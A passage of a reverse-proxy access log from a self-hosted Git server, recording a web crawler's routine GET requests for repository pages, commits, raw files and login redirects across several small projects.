216.73.216.188] [Length 35225] [Gzip 7.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/README.md" [Client 216.73.216.188] [Length 9779] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 216.73.216.188] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/README.md" [Client 216.73.216.188] [Length 820] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Ftemplates" [Client 216.73.216.188] [Length 32908] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2Fassets" [Client 216.73.216.188] [Length 49422] [Gzip 8.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Ftypes.ts" [Client 216.73.216.188] [Length 23326] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 11138] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 11066] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp%2Fdatabase.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets" [Client 216.73.216.188] [Length 29866] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 11133] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2F.vscode" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 11129] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 216.73.216.188] [Length 10902] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 11124] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 11067] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 217445] [Gzip 13.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 216.73.216.188] [Length 15326] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 216.73.216.188] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 216.73.216.188] [Length 10315] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 11133] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 22655] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata" [Client 216.73.216.188] [Length 303116] [Gzip 13.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 216.73.216.188] [Length 11893] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2FDockerfile" [Client 216.73.216.188] [Length 25408] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/index.html" [Client 216.73.216.188] [Length 822] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fobj" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 216.73.216.188] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/index.html" [Client 216.73.216.188] [Length 9771] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 11583] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 216.73.216.188] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 26836] [Gzip 5.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 15610] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 11065] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 216.73.216.188] [Length 772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 13425] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 216.73.216.188] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" [Client 216.73.216.188] [Length 10260] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 216.73.216.188] [Length 14458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FTestService.csproj" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js" [Client 216.73.216.188] [Length 10098] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 12190] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11571] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fproxy-host-1_access.log" [Client 216.73.216.188] [Length 27234] [Gzip 7.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Fnginx%2Fproxy_host%2F4.conf" [Client 216.73.216.188] [Length 23781] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 11772] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 216.73.216.188] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 216.73.216.188] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf?display=source" [Client 216.73.216.188] [Length 11924] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fletsencrypt" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FProperties" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 11123] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fvite.config.ts" [Client 216.73.216.188] [Length 23715] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr 